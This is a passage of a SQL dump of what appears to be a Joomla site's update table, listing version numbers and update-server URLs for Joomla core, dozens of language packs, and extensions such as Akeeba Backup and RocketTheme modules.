Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5880,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5881,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5882,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5883,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5884,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5885,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5886,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5887,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5888,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5889,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5890,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5891,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5892,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5893,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5894,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5895,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5896,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5897,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5898,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5899,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5900,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5901,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5902,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5903,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5904,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5905,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5906,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5907,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5908,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5909,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5910,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5911,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5912,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5913,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5914,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5915,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5916,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5917,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5918,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5919,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5920,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5921,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5922,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5923,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5924,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5925,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5926,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5927,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5928,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5929,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5930,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5931,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5932,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5933,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5934,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5935,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5936,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5937,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5938,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5939,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5940,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5941,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5942,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5943,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5944,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5945,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5946,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5947,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5948,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5949,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5950,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5951,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5952,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5953,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5954,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5955,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5956,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5957,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5958,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5959,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5960,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5961,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5962,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5963,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5964,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5965,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5966,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5967,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5968,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(5969,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5970,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5971,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5972,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5973,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5974,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5975,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5976,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5977,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5978,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5979,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5980,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5981,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5982,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5983,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5984,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5985,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5986,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5987,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5988,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5989,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5990,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5991,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5992,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5993,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5994,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5995,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5996,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5997,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5998,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5999,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6000,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6001,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6002,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6003,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6004,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6005,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6006,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6007,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6008,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6009,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6010,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6011,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6012,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6013,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6014,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6015,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6016,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6017,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6018,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6019,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6020,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6021,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6022,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6023,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6024,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6025,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6026,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6027,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6028,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6029,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6030,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6031,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6032,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6033,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6034,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6035,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6036,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6037,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6038,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6039,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6040,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6041,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6042,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6043,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6044,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6045,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6046,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6047,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6048,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6049,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6050,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6051,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6052,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6053,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6054,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6055,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6056,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6057,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6058,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6059,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6060,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6061,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6062,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6063,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6064,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6065,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6066,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6067,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6068,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6069,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6070,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6071,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6072,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6073,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6074,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6075,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6076,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6077,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6078,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6079,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6080,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6081,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6082,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6083,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6084,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6085,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6086,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6087,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6088,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6089,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6090,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6091,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6092,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6093,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6094,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		